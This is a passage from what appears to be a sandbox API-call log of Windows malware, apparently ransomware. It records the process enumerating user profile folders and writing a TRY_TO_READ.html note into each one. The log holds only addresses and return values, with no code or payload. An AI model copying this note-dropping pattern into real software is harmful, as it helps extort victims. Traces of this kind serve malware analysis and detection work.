hTemplateFile=0x0) returned 0x464 [0117.370] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x335e78 | out: hHeap=0x2e0000) returned 1 [0117.370] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.371] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.371] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.371] CloseHandle (hObject=0x464) returned 1 [0117.371] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.371] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.371] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.371] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324cf8 | out: hHeap=0x2e0000) returned 1 [0117.371] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5f5d9f50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x5f5d9f50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0117.371] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.371] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.372] GetLastError () returned 0x0 [0117.372] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.372] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x335e78 | out: hHeap=0x2e0000) returned 1 [0117.372] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.373] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.373] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.373] CloseHandle (hObject=0x464) returned 1 [0117.374] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.374] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.374] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.374] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324d50 | out: hHeap=0x2e0000) returned 1 [0117.374] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5ab50e70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x5ab50e70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0117.374] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.374] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.374] GetLastError () returned 0x0 [0117.374] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.375] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3293d0 | out: hHeap=0x2e0000) returned 1 [0117.375] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.376] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.376] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.376] CloseHandle (hObject=0x464) returned 1 [0117.376] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.376] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.376] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.376] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338828 | out: hHeap=0x2e0000) returned 1 [0117.376] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0117.376] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.376] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.376] GetLastError () returned 0x0 [0117.376] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.377] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3293d0 | out: hHeap=0x2e0000) returned 1 [0117.377] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.377] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.378] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.378] CloseHandle (hObject=0x464) returned 1 [0117.378] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.378] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.378] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.378] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338890 | out: hHeap=0x2e0000) returned 1 [0117.378] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0117.378] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.378] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.378] GetLastError () returned 0x0 [0117.378] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.379] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3293d0 | out: hHeap=0x2e0000) returned 1 [0117.379] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.380] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.380] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.380] CloseHandle (hObject=0x464) returned 1 [0117.380] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3388f8 | out: hHeap=0x2e0000) returned 1 [0117.381] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0117.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.381] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.381] GetLastError () returned 0x0 [0117.381] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x335e78 | out: hHeap=0x2e0000) returned 1 [0117.381] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.382] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.382] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.382] CloseHandle (hObject=0x464) returned 1 [0117.382] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.382] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.382] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.382] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x360970 | out: hHeap=0x2e0000) returned 1 [0117.382] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0117.382] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.382] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.382] GetLastError () returned 0x0 [0117.383] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5b190830, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x5b190830, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0117.383] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.383] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.383] GetLastError () returned 0x0 [0117.383] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.384] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x335e78 | out: hHeap=0x2e0000) returned 1 [0117.384] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.384] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.385] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.385] CloseHandle (hObject=0x464) returned 1 [0117.385] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.385] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.385] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.385] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3609c8 | out: hHeap=0x2e0000) returned 1 [0117.385] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0117.385] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.385] GetLastError () returned 0x0 [0117.385] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.386] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3293d0 | out: hHeap=0x2e0000) returned 1 [0117.386] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.387] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.387] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.387] CloseHandle (hObject=0x464) returned 1 [0117.387] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.387] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.387] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.387] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.387] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0117.387] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.387] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.387] GetLastError () returned 0xb7 [0117.387] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\nethood\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0117.388] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x335e78 | out: hHeap=0x2e0000) returned 1 [0117.388] WriteFile (in: hFile=0x464, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.389] WriteFile (in: hFile=0x464, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.389] WriteFile (in: hFile=0x464, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.389] CloseHandle (hObject=0x464) returned 1 [0117.389] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.389] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c48 | out: hHeap=0x2e0000) returned 1 [0117.389] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330c38 | out: hHeap=0x2e0000) returned 1 [0117.389] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x360a20 | out: hHeap=0x2e0000) returned 1 [0117.389] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c30f920, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2c30f920, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0117.389] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.389] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.389] GetLastError () returned 0x0 [0117.390] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c16ca00, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0117.390] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.390] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.390] GetLastError () returned 0x0 [0117.390] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0117.390] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.390] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.390] GetLastError () returned 0x0 [0117.390] FindNextFileW (in: hFindFile=0x35dd58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0117.390] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, 